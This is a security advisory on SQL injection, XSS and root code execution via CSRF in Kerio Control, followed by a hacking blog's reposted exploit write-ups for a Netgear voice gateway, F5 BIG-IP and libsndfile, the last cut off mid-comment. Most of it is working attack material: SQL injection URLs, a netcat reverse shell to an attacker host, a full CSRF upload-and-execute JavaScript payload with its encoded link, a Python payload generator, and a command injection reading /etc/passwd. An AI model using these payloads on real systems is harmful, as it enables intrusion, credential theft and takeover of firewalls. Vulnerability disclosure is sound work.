IntelliSec Security Advisory
==============================================================================================
Title: Multiple Vulnerabilities in Kerio Control (Virtual Appliance)
Vulnerabilities: SQL Injection, Remote Code Execution through CSRF
Product: Kerio Control
Homepage: http://www.kerio.com
Affected Version: <= 8.6.1
Fixed Version: 8.6.2 (partially fixed)
Impact: critical
Date: 2015-10-12
Author: Raschin Tavakoli | IntelliSec Research
http://www.intellisec.at
research@intellisec.at
Links: https://youtu.be/EzTI2WlGHb4
===============================================================================================
Vendor description:
===================
Kerio Control is a unified threat management firewall developed by Kerio Technologies. It
features intrusion prevention, content filtering, activity reporting, bandwidth management,
and virtual private networking. Kerio Control runs Linux, providing network perimeter defense
for small to medium organizations.
Vulnerabilities
===============
1. XSS with Anti-XSS-Filter bypass (nonauth area)
2. SQL Injection (non-admin area)
3. Remote Code Execution (admin area)
By chaining the vulnerabilities together in combination with user interaction, an attacker may
gain full control over the firewall and the underlying network.
Attack Scenario
===============
The first attack could be to trick non-admin users to follow a malicious link in order to trigger
a CSRF exploit via the /nonauth/certificate.php script. The script may exploit the SQL Injection
flaw in reports.php for example.
Once able to query the database, sensitive data of the users can be transmitted back to the
attacker. Information of interest could be for example the traffic usage of admin users and their
top-visited webpages.
In the next attack, this information may be used to embed another CSRF exploit into one of
the top-visited webpages. If the attacker succeeds and the exploit gets triggered by a visiting
admin, arbitrary remote code execution will be gained.
===============================================================================================
1. SQL Injection:
===============================================================================================
Short Description:
==================
Kerio Control suffers from an SQL Injection flaw in the report.php script.
Detailed Description:
=====================
It is not necessary to use blind sql injection, as the output will be rendered into an image file.
As the text in the image file has a fixed size, multiple union selects can be combined to render out
multiple images containing the result text of the query.
In order to exploit the issue, a user has to be authenticated. For non-admin users, webreports
have to be enabled.
This issue is fixed in 8.6.2
Proof of Concept:
=================
GET /report.php?id=1'+OR+'1'%3d'1'%3b+-- HTTP/1.1
Host: testbox:4081
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SESSION_CONTROL_WEBIFACE=c0fa6c207d812da1fce3e2ff2bc2e609948988a041f5a23adb64064a42010e6b;
TOKEN_CONTROL_WEBIFACE
For example, to read out the admin's internal UUID number, the following union based sql injection
can be used:
https://testbox:4081/report.php?start=16703, 0, 0) UNION SELECT 'x', 'Admin UUID: ' ||
substring(cast( (select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256))
from 1 for 14), REQUESTS FROM GET_ALL_TOP_WEBS_D(16703, 1) UNION SELECT 'y', substring(cast(
(select UUID from USER_LIST WHERE USERNAME='Admin') as varchar(256)) from 15 for 40), '7'
FROM GET_ALL_TOP_WEBS_D(16703, 1);+--+&end=16703&id=0'+OR+USERNAME='Admin';+--+
=======================
2. Cross Site Scripting
=======================
The server parameter in the nonauth/certificate.php script suffers from an non persistent XSS
vulnerability. The payload needs to be base64 encoded and will be decoded at runtime. That way
it bypasses all Anti-XSS Filters of modern browsers, which increases the severity of this issue
significantly.
The issue has been tested with OS X Chrome Version 45.0.2454.101, OS X Safari Version 9.0
(10601.1.56.2), Linux Chromium Version 37.0.2062.120 and Linux Iceweasel 31.8.0
This issue is fixed in 8.6.2
===============================================================================================
3. Remote Command Execution via File Upload
===============================================================================================
Short Description:
==================
Kerio Control suffers from a RCE vulnerability in the upgrade function in the admin interface.
A malicious ssh script can be uploaded and executed with root privileges.
Detail:
=======
The upgrade feature in the admin interface can be used to upload arbitrary files by simply
changing a tar file to the extension .img. If a tar file is created which contains a upgrade.sh shell
script, this script will be executed with root privileges. Kerio did not provide a fix for the
upgrade functionality yet.
========================================
4. Remote Command Execution through CSRF
========================================
The Kerio admin interface does not provide a functionality to execute shell commands on the
underlying Linux system nor a possibility to enable ssh. SSH is disabled by default and can
only be enabled through the Kerio Console Application.
By combining the RCE with an CSRF attack, this vulnerability becomes a serious issue.
Proof of Concept:
=================
Create a Bash Script:
---------------------
# cat upgrade.sh
# #!/bin/bash
# nc 10.0.0.2 5555 -e /bin/bash &
# tar czf upgrade.tar.gz *
# mv upgrade.tar.gz upgrade.img
Open a netcat listener on the attacker's machine 10.0.0.2:
----------------------------------------------------------
# nc -lvp 5555
Generate Javascript Payload (File Upload and Execution):
--------------------------------------------------------
<script>
url='http://10.0.0.1:4081/admin';
_token="";
_file="";
_id = "";
function reqListener () {
obj = JSON.parse(this.responseText);
file = obj.result.fileUpload.name;
id = obj.result.fileUpload.id;
createIFrame(file, id);
}
function createIFrame(file, id) {
iframe=document.createElement("iframe");
iframe.src=url + "/constants.js.php";
iframe.style.display = "none";
iframe.sandbox="allow-scripts allow-same-origin";
iframe.onload=function() {
cookie = iframe.contentWindow.document.cookie;
var re = new RegExp(name + "=([^;]+)");
var value = re.exec(cookie);
var token=(value != null) ? unescape(value[1]) : null;
executeScript(file, id, token);
}
document.body.appendChild(iframe);
}
function executeScript(file, id, token) {
_file = file;
_id = id;
_token = token;
var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);
xmlhttp.setRequestHeader("X-Token", token);
xmlhttp.addEventListener("load", executeScript2);
xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));
}
function executeScript2(file, token) {
var xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);
xmlhttp.setRequestHeader("X-Token", _token);
xmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));
}
var xhr = new XMLHttpRequest();
xhr.open("POST", url + "/api/jsonrpc/upload/", true);
xhr.addEventListener("load", reqListener);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");
xhr.withCredentials = true;
var body = "-----------------------------1038495162429835808207612951\r\n" +
"Content-Disposition: form-data; name=\"uploadImage\"; filename=\"upgrade.img\" \r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x1f\x8b\x08\x00\xe0\x6e\x02\x56\x00\x03\xed\xce\xb1\x0e\x82\x30\x10\xc6\xf1\xce\x3c\xc5\x19\x13\x37\xe1\x8a\x2d\x3e\x4f\x51\x22\x2e\x60\x5a\x78\x7f\xab\x83\x24\x0e\x3a\x11\x63\xf2\xff\xdd\xf0\x25\xf7\xdd\x70\xf3\xed\x12\xc3\xb9\x2b\x53\x6f\x56\xa3\x59\xe3\xdc\x33\xb3\xf7\x54\xf5\xce\xd8\xba\x51\x75\xcd\xf1\xe0\xf2\xde\x5a\x9f\x43\x74\xbd\x97\x16\x73\x9a\x42\x14\x31\x71\x1c\xa7\x4f\x77\xdf\xfa\x3f\xb5\xdd\x54\xed\x75\xa8\xda\x90\xfa\x62\x38\x89\xd5\xf2\x31\xb5\xf8\x4c\xf6\x9d\xbc\x5a\xd9\x15\xbf\xfe\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xb8\x03\x94\x67\x18\xfa\x00\x28\x00\x00\r\n" +
"-----------------------------1038495162429835808207612951--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
</script>
Base64 encode and craft malicous link:
https://testbox:4081/nonauth/certificate.php?server=PHNjcmlwdD4KdXJsPSdodHRwOi8vMTAuMC4wLjE6NDA4MS9hZG1pbic7Cl90b2tlbj0iIjsKX2Zp
bGU9IiI7Cl9pZCA9ICIiOwpmdW5jdGlvbiByZXFMaXN0ZW5lciAoKSB7CglvYmogPSBKU09OLnBh
cnNlKHRoaXMucmVzcG9uc2VUZXh0KTsKCWZpbGUgPSBvYmoucmVzdWx0LmZpbGVVcGxvYWQubmFt
ZTsKCWlkID0gb2JqLnJlc3VsdC5maWxlVXBsb2FkLmlkOwoJY3JlYXRlSUZyYW1lKGZpbGUsIGlk
KTsKfQpmdW5jdGlvbiBjcmVhdGVJRnJhbWUoZmlsZSwgaWQpIHsKCWlmcmFtZT1kb2N1bWVudC5j
cmVhdGVFbGVtZW50KCJpZnJhbWUiKTsKCWlmcmFtZS5zcmM9dXJsICsgIi9jb25zdGFudHMuanMu
cGhwIjsKCWlmcmFtZS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwoJaWZyYW1lLnNhbmRib3g9ImFs
bG93LXNjcmlwdHMgYWxsb3ctc2FtZS1vcmlnaW4iOwoJaWZyYW1lLm9ubG9hZD1mdW5jdGlvbigp
IHsKCQljb29raWUgPSBpZnJhbWUuY29udGVudFdpbmRvdy5kb2N1bWVudC5jb29raWU7CgkJdmFy
IHJlID0gbmV3IFJlZ0V4cChuYW1lICsgIj0oW147XSspIik7CgkJdmFyIHZhbHVlID0gcmUuZXhl
Yyhjb29raWUpOwoJCXZhciB0b2tlbj0odmFsdWUgIT0gbnVsbCkgPyB1bmVzY2FwZSh2YWx1ZVsx
XSkgOiBudWxsOwoJCWV4ZWN1dGVTY3JpcHQoZmlsZSwgaWQsIHRva2VuKTsKCX0KCWRvY3VtZW50
LmJvZHkuYXBwZW5kQ2hpbGQoaWZyYW1lKTsKfQpmdW5jdGlvbiBleGVjdXRlU2NyaXB0KGZpbGUs
IGlkLCB0b2tlbikgewoJX2ZpbGUgPSBmaWxlOwoJX2lkID0gaWQ7CglfdG9rZW4gPSB0b2tlbjsK
CXZhciB4bWxodHRwPW5ldyBYTUxIdHRwUmVxdWVzdCgpO3htbGh0dHAub3BlbigiUE9TVCIsIHVy
bCArICIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgt
VG9rZW4iLCB0b2tlbik7Cgl4bWxodHRwLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCBleGVjdXRl
U2NyaXB0Mik7Cgl4bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtUmVxdWVzdGVkLVdpdGgiLCAi
WE1MSHR0cFJlcXVlc3QiKTsKCXhtbGh0dHAuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBl
IiwgImFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD1VVEYtOCIpOwoJeG1saHR0cC5zZW5kKEpTT04u
c3RyaW5naWZ5KHsianNvbnJwYyI6IjIuMCIsImlkIjoxLCJtZXRob2QiOiJVcGRhdGVDaGVja2Vy
LnVwbG9hZEltYWdlIiwicGFyYW1zIjp7ImZpbGVJZCI6IGZpbGV9fSkpOwp9CmZ1bmN0aW9uIGV4
ZWN1dGVTY3JpcHQyKGZpbGUsIHRva2VuKSB7Cgl2YXIgeG1saHR0cD1uZXcgWE1MSHR0cFJlcXVl
c3QoKTt4bWxodHRwLm9wZW4oIlBPU1QiLCB1cmwgKyIvYXBpL2pzb25ycGMvIiwgdHJ1ZSk7Cgl4
bWxodHRwLnNldFJlcXVlc3RIZWFkZXIoIlgtVG9rZW4iLCBfdG9rZW4pOwoJeG1saHR0cC5zZXRS
ZXF1ZXN0SGVhZGVyKCJYLVJlcXVlc3RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Iik7Cgl4bWxo
dHRwLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi9qc29uO2No
YXJzZXQ9VVRGLTgiKTsKCXhtbGh0dHAuc2VuZChKU09OLnN0cmluZ2lmeSh7Impzb25ycGMiOiIy
LjAiLCJpZCI6MSwibWV0aG9kIjoiVXBkYXRlQ2hlY2tlci5wZXJmb3JtQ3VzdG9tVXBncmFkZSIs
InBhcmFtcyI6eyJpZCI6IF9pZCB9fSkpOwp9CnZhciB4aHIgPSBuZXcgWE1MSHR0cFJlcXVlc3Qo
KTsKeGhyLm9wZW4oIlBPU1QiLCB1cmwgKyAiL2FwaS9qc29ucnBjL3VwbG9hZC8iLCB0cnVlKTsK
eGhyLmFkZEV2ZW50TGlzdGVuZXIoImxvYWQiLCByZXFMaXN0ZW5lcik7Cnhoci5zZXRSZXF1ZXN0
SGVhZGVyKCJBY2NlcHQiLCAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNh
dGlvbi94bWw7cT0wLjksKi8qO3E9MC44Iik7Cnhoci5zZXRSZXF1ZXN0SGVhZGVyKCJBY2NlcHQt
TGFuZ3VhZ2UiLCAiZW4tVVMsZW47cT0wLjUiKTsKeGhyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRl
bnQtVHlwZSIsICJtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0xMDM4NDk1MTYyNDI5ODM1ODA4MjA3NjEyOTUxIik7Cnhoci53aXRoQ3JlZGVu
dGlhbHMgPSB0cnVlOwp2YXIgYm9keSA9ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEw
Mzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTFcclxuIiArIAoiQ29udGVudC1EaXNwb3NpdGlvbjog
Zm9ybS1kYXRhOyBuYW1lPVwidXBsb2FkSW1hZ2VcIjsgZmlsZW5hbWU9XCJ1cGdyYWRlLmltZ1wi
IFxyXG4iICsgCiJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbVxyXG4iICsg
CiJcclxuIiArIAoiXHgxZlx4OGJceDA4XHgwMFx4YWJceDZmXHgwMlx4NTZceDAwXHgwM1x4ZWRc
eGNlXHhiMVx4MGVceDgyXHg0MFx4MTBceDg0XHhlMVx4YWJceDc5XHg4YVx4MzVceDI2XHg3Nlx4
YzJceDFlXHhkZVx4MWRceGNmXHgwM1x4NGFceGM0XHgwNlx4Y2NceDFkXHhiY1x4M2ZceDY4XHgy
MVx4ODlceDg1XHg1Nlx4YzRceDk4XHhmY1x4ZGZceDE2XHg1M1x4Y2NceDE2XHgzM1x4ZGRceGFm
XHhiMVx4YmVceGI0XHg3OVx4ZWFceGNjXHg2Nlx4NzRceDExXHg5Y1x4N2JceGU2XHhlMlx4M2Rc
eDU1XHhiZFx4MzNceGI2XHgwY1x4YWFceDJlXHg1NFx4YzFceDlmXHg4Y1x4NWFceGViXHg1ZFx4
NjVceDQ0XHhiN1x4OWJceGI0XHg5YVx4ZDJceDU4XHg0N1x4MTFceDEzXHg4N1x4NjFceGZjXHhm
NFx4ZjdceGFkXHhmZlx4NTNceGZiXHg1ZFx4ZDFceGRjXHhmYVx4YTJceGE5XHg1M1x4OTdceGY1
XHg2N1x4YjFceDlhXHgzZlx4YWVceDE0XHhiZlx4OTBceDYzXHgyYlx4YWZceDU2XHgwZVx4ZDlc
eGFmXHhiN1x4MDJceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4MDBceDAwXHgwMFx4
MDBceDAwXHg1Nlx4MzNceGNmXHhiMlx4M2JceDZjXHgwMFx4MjhceDAwXHgwMFxyXG4iICsgCiIt
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTEwMzg0OTUxNjI0Mjk4MzU4MDgyMDc2MTI5NTEt
LVxyXG4iOwp2YXIgYUJvZHkgPSBuZXcgVWludDhBcnJheShib2R5Lmxlbmd0aCk7CmZvciAodmFy
IGkgPSAwOyBpIDwgYUJvZHkubGVuZ3RoOyBpKyspCmFCb2R5W2ldID0gYm9keS5jaGFyQ29kZUF0
KGkpOyAKeGhyLnNlbmQobmV3IEJsb2IoW2FCb2R5XSkpOwo8L3NjcmlwdD4K
Python 3 payload generator
==========================
For easier testing, we developed a small python script that can be used to
generate the payload:
#!/usr/bin/python
# ====================================================================== #
# Title: Remote Command Execution through CSRF - Payload Generator #
# Author: Raschin Tavakoli - IntelliSec GmbH #
# Date: 12.10.2015 #
# #
# Description: #
# This python3 script generates the payload to exploit the RCE via CSRF #
# vulnerability in the Kerio Control Virtual Appliance. #
# #
# First a shell script will be packed as an Kerio upgrade.img file. Then #
# a Javascript will be generated which uploads the file via the Kerio #
# upgrade function. The payload will then be base64 encoded and can be #
# injected into the server parameter of the #
# nonauth/certificate.php script (). #
# #
# Example Usage: #
# csrf-gen-payload.py -t https://10.0.0.8:4081/admin -l 10.0.0.7 -p 5555 #
# ====================================================================== #
import os
import shutil
import base64
import argparse
import subprocess
from optparse import OptionParser
import codecs
import sys
tmpdir = "/tmp/kerio_upgrade"
def usage():
print ("\nUsage: csrf-gen-payload -f <file> -t <target-url> \n")
print("Example: csrf-gen-payload.py -f upgrade.sh -t https://10.0.0.8:4081/admin \n")
exit()
def main():
parser = OptionParser()
parser.add_option("-f", "--file", dest="file",
help="the bash file for remote execution", metavar="TARGET")
parser.add_option("-t", "--target", dest="target_url",
help="specify the target url", metavar="TARGET")
(options, args) = parser.parse_args()
file = options.file
target_url = options.target_url
if not target_url or not file:
usage()
# ====================================================================== #
# Create upgrade.img file #
# ====================================================================== #
orgdir = os.path.dirname(os.path.realpath(__file__))
try:
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
except:
print("Cannot clean " + tmpdir)
os.mkdir(tmpdir)
shutil.copy(file, tmpdir + os.path.sep + "upgrade.sh")
os.chdir(tmpdir)
os.system("tar czf upgrade.tar.gz *")
src = os.path.join(tmpdir, "upgrade.tar.gz")
dst = os.path.join(tmpdir, "upgrade.img")
os.rename(src, dst)
f = open('upgrade.img', 'rb',)
bin_data = f.read()
f.close()
hexdata = "".join("\\x{:02x}".format(c) for c in bin_data)
# ====================================================================== #
# Generate Javascript Payload #
# ====================================================================== #
script = ('<script>\n' +
'url=\'' + target_url +
'\';\n' +
'_token="";\n' +
'_file="";\n' +
'_id = "";\n' +
'function reqListener () {\n' +
'\tobj = JSON.parse(this.responseText);\n' +
'\tfile = obj.result.fileUpload.name;\n' +
'\tid = obj.result.fileUpload.id;\n' +
'\tcreateIFrame(file, id);\n' +
'}\n' +
'function createIFrame(file, id) {\n' +
'\tiframe=document.createElement("iframe");\n' +
'\tiframe.src=url + "/constants.js.php";\n' +
'\tiframe.style.display = "none";\n' +
'\tiframe.sandbox="allow-scripts allow-same-origin";\n' +
'\tiframe.onload=function() {\n' +
'\t\tcookie = iframe.contentWindow.document.cookie;\n' +
'\t\tvar re = new RegExp(name + "=([^;]+)");\n' +
'\t\tvar value = re.exec(cookie);\n' +
'\t\tvar token=(value != null) ? unescape(value[1]) : null;\n' +
'\t\texecuteScript(file, id, token);\n' +
'\t}\n' +
'\tdocument.body.appendChild(iframe);\n' +
'}\n' +
'function executeScript(file, id, token) {\n' +
'\t_file = file;\n' +
'\t_id = id;\n' +
'\t_token = token;\n' +
'\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url + "/api/jsonrpc/", true);\n' +
'\txmlhttp.setRequestHeader("X-Token", token);\n' +
'\txmlhttp.addEventListener("load", executeScript2);\n' +
'\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' +
'\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' +
'\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.uploadImage","params":{"fileId": file}}));\n' +
'}\n' +
'function executeScript2(file, token) {\n' +
'\tvar xmlhttp=new XMLHttpRequest();xmlhttp.open("POST", url +"/api/jsonrpc/", true);\n' +
'\txmlhttp.setRequestHeader("X-Token", _token);\n' +
'\txmlhttp.setRequestHeader("X-Requested-With", "XMLHttpRequest");\n' +
'\txmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");\n' +
'\txmlhttp.send(JSON.stringify({"jsonrpc":"2.0","id":1,"method":"UpdateChecker.performCustomUpgrade","params":{"id": _id }}));\n' +
'}\n' +
'var xhr = new XMLHttpRequest();\n' +
'xhr.open("POST", url + "/api/jsonrpc/upload/", true);\n' +
'xhr.addEventListener("load", reqListener);\n' +
'xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");\n' +
'xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");\n' +
'xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1038495162429835808207612951");\n' +
'xhr.withCredentials = true;\n' +
'var body = "-----------------------------1038495162429835808207612951\\r\\n" + \n' +
'"Content-Disposition: form-data; name=\\"uploadImage\\"; filename=\\"upgrade.img\\" \\r\\n" + \n' +
'"Content-Type: application/octet-stream\\r\\n" + \n' +
'"\\r\\n" + \n' +
'"' + hexdata + '\\r\\n" + \n' +
'"-----------------------------1038495162429835808207612951--\\r\\n";\n' +
'var aBody = new Uint8Array(body.length);\n' +
'for (var i = 0; i < aBody.length; i++)\n' +
'aBody[i] = body.charCodeAt(i); \n' +
'xhr.send(new Blob([aBody]));\n' +
'</script>')
print(script)
os.chdir(orgdir)
shutil.rmtree(tmpdir)
if __name__ == '__main__':
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863532688
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: [Netgear Voice Gateway Multiple Vulnerabilities]
# Date: May 01, 2015 [No response from Vendor]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.netgear.com]
# Version: [Firmware Version: V2.3.0.23_2.3.23]
*Netgear Voice Gateway Multiple Vulnerabilities *
*Device Info *
Device Type: Netgear Voice Gateway EVG2000
Account Name: EVG2000
Firmware Version: V2.3.0.23_2.3.23
*1. Web application vulnerabilities OS Command Injection *
Netgear Voice Gateway EVG2000 is managed through a web management portal.
The application provides a Diagnostics feature that has four (4) options:
a.Ping an IP address
b.Perform a DNS Lookup
c.Display the Routing Table
d.Reboot the Router
Option 1 Ping an IP address was confirmed to be vulnerable to OS Command
Injection.
The ping_IPAddr parameter does not sufficiently validate input. It is
possible to use the semi-colon character (;) to inject arbitrary OS
commands and retrieve the output in the application's responses.
*PoC*
*HTTP POST Request*
POST /ping.cgi HTTP/1.1
Host: 1.3.3.7
User-Agent: blah
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Referer: http://1.3.3.7/DIAG_diag.htm
Authorization: Basic <b64_value_here>
Content-Length: 69
IPAddr1=1&IPAddr2=3&IPAddr3=3&IPAddr4=7&ping=Ping&ping_IPAddr=1.3.3.7;cat
/etc/passwd
*HTTP Response*
.....
<html-output>
root:<redacted_hash>:0:0:Linux User,,,:/root/:/bin/sh
nobody:*:0:0nobody:/:/bin/sh
admin:<clear-text-admin-pass>:0:0:admin:/:/bin/sh
*2. Web application vulnerabilities Stored Cross-Site Scripting (XSS) *
In the Services menu, the Service Table lists any existing Service-Port
mappings. A new service can be added with a payload value of
*<script>alert(xss)</script>* in the ServiceType parameter.
The application does not check any malicious input and accepted this new
entry. The JavaScript input was then returned unmodified in a subsequent
request for the Services Table Entries.
The web application lacks strict input validation and hence is vulnerable
to Stored Cross-Site Scripting attack.
*3. Application does not secure configured passwords (HTTP) *
Any & all configured sensitive information such as passwords & keys are not
secured properly. These are masked and only ***** is shown in the
corresponding fields.
This client-side restriction can easily be bypassed though. It is possible
to capture masked values via ‘Inspect Element’ and / or via an intercepting
proxy.
The application should mask/censure (*****) the passwords, keys and any
other crucial pieces of configuration and must not pass the values in
clear-text.
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040
]
# Multiple Additional F5 products & versions are Affected and documented
here:
https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
*Vulnerability Details*
The handler parameter is vulnerable to file path manipulation attacks. When
we submit a payload
*/tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler*
parameter, the file *WEB-INF/web.xml* is returned.
*PoC:*
POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://
<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F;
BIGIPAuthUsernameCookie=admin;
BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5;
F5_CURRENT_PARTITION=Common;
f5formpage="/tmui/locallb/virtual_server/list.jsp?&";
f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp";
f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""
_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
*...[SNIP]...*
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=
*%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml*
*Web.xml is returned in the Response:*
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
*<!--Automatically created by Tomcat JspC.--><web-app>*
*...[config file output redacted here]...*
*.....*
#!/usr/bin/env perl
#
# Exploit Title: libsndfile <= 1.0.25 (latest version) Heap overflow
# Date: 07 Oct 2015
# Exploit Author: Marco Romano @nemux_
# Vendor Homepage: http://www.mega-nerd.com/libsndfile/
# Version: <= 1.0.25
# Tested on: Ubuntu 15.04 / OS X El Capitan 10.11
#
####################################################################
#
# Author: Marco Romano (@nemux_) - 07 Oct 2015
#
# PoC for libsndfile <= 1.0.25 (latest version) Heap overflow
#
# run ./poc.pl to make nemux.aiff file. Now it can be delivered in different ways.
#
# Possible attack vectors:
# - Firefox (on Linux) -> SWF/Audio play -> pulseaudio -> libsndfile ?? (not tested)
# - Email attachment
# - TCP socket connection (for audio server only)
# - File upload (ex. server side audio file manipulation, interactive voice responder)
# - etc...
# -----------------------------------------------------------------------------------------
# [*] Affected products: -- All products using libsndfile (a non-exhaustive list below)
#
# [-] PusleAudio - http://www.freedesktop.org/wiki/Software/PulseAudio/ (TESTED)
# Installed by default on most linux environments with libsndfile too (Ex.: Ubuntu, Debian)
# [-] Jack AudioConnectionKit- http://www.jackaudio.org (TESTED)
# Available for Linux, Win, OSX (List of applications http://www.jackaudio.org/applications/)
# [-] Adobe Audition - http://www.adobe.com/products/audition.html (TESTED)
# [-] Audacity - http://www.audacityteam.org/ (TESTED)
# [-] Asterisk-eSpeak Module - https://zaf.github.io/Asterisk-eSpeak/ (NOT TESTED)
#
# run an "apt-cache rdepends libsndfile1" to see other interesting dependencies
# searching around i found that library is widely used on IOS and Android projects too
# ------------------------------------------------------------------------------------------
# [*] libsndfile web site references
#
# [-] http://www.mega-nerd.com/libsndfile/
# [-] https://github.com/erikd/libsndfile.git
# [-] https://en.wikipedia.org/wiki/Libsndfile
#
# Note: (wikipedia reports that LAME encoder depends by libsndfile too
# but i didn't find this dependecy...)
########################################################################################
#### Vulnerability is based on the wrong management of the headindex and headend values.
#### While parsing a specially crafted AIFF header the attacker can manage index values
#### in order to use memcpy(...) to overwrite memory heap.
########################################################################################
####
# Some parts of the source code:
#
# -- common.c:337 [*]
# ...
# #define SF_STR_BUFFER_LEN (8192)
# #define SF_HEADER_LEN (4100 + SF_STR_BUFFER_LEN)
# ...
# typedef struct sf_private_tag
# {
# ...
# ...
# /* Index variables for maintaining logbuffer and header above. */
# ...
# int headindex, headend ;
# ...
# /* Virtual I/O functions. */
# int virtual_io ;
# SF_VIRTUAL_IO vio ;
# ...
# ...
# } SF_PRIVATE;
#
# Take a look to the source of aiff.c:
# -- git clone https://github.com/erikd/libsndfile.git
#
# src/aiff.c:403
# while (!done) { ... }
# -->
# src/common.c:
# int psf_binheader_readf (SF_PRIVATE *psf, char const *format, ...) { }
# --> -->
# src/common.c:793
# static int header_read (SF_PRIVATE *psf, void *ptr, int bytes)
# --> --> -->
# src/common.c:
# static int header_read(...) {
# ...
# memcpy (ptr, psf->header + psf->headindex, bytes) ;
# psf->headindex += bytes ;
#
# } /* header_read */
#
# Thourgh a specially crafted AIFF header we can
# 1- increase and decrease the headindex value regardless what should be its real value
# 2- Overwriting memory with arbitrary data...
#
### Pulseudio test on x86_64
#
